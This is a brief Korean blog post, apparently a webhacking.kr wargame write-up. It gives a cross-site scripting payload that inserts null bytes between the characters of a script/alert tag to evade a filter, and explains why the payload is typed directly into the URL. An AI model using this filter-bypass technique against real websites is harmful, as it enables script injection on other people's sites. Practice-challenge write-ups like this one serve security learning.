728x90
input 태그에 입력하면 code라는 url 키의 값으로 주어짐
주소창에다가 code의 값에 다음 구문 직접 입력
input 태그에 입력하면 %가 %25로 url 인코딩 되기 때문에 직접 주소창에 입력해야함(';'도 반드시 입력해야 통과됨)
<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t%00%28%001%00%29%00;%00<%2F%00s%00c%00r%00i%00p%00t>
728x90
'webhacking.kr' 카테고리의 다른 글
| webhacking 26(URL Encoding) (0) | 2022.12.18 |
|---|---|
| webhacking 25(LFI) (0) | 2022.12.17 |
| webhacking 24(PHP) (0) | 2022.12.17 |
| webhacking 22(Blind SQL Injection) (0) | 2022.12.17 |
| webhacking 21(Blind SQL Injection) (0) | 2022.12.16 |